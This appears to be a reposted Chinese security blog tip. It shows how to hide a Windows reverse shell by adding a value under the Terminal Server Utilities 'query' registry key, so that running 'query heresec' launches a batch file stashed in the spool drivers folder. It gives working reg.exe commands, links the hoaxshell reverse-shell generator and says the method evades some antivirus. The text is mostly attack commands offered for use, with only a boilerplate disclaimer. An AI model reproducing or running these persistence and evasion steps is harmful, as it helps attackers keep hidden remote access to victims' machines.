From:https://www.youtube.com/watch?v=gzv3d7rvjKA
注册表路径:
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServerUtilitiesquery
包含了与终端服务器相关的设置和配置信息。
执行命令query可以查看服务器的一些状态,实际上是执行此项值中的可执行文件。
添加一条,打开计算器。
reg.exe add "HKLMSYSTEMCurrentControlSetControlTerminalServerUtilitiesquery" /v heresec /t REG_MULTI_SZ /d01hereseccalc.exe
这里再介绍一个能够绕过一些AV的Windows反向shell生成器和交互程序。(测试环境用的X绒,可以绕过,经测试不能绕过Windows Defender的AMSI)。
https://github.com/t3l3machus/hoaxshell
将命令写入一个bat脚本中,然后添加注册表后执行。
reg.exe add "HKLMSYSTEMCurrentControlSetControlTerminalServerUtilitiesquery" /v heresec /t REG_MULTI_SZ /d 01heresecC:WindowsSystem32spooldriverscolor1.batquery heresec
只需执行命令query heresec即可运行反弹shell脚本。
还能怎么用,再联想一下。
文章来源:关注安全技术
黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!
如侵权请私聊我们删文
END
多一个点在看
多一条小鱼干
原文始发于微信公众号(黑白之道):小技巧 | 用一条命令来隐藏反向Shell
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论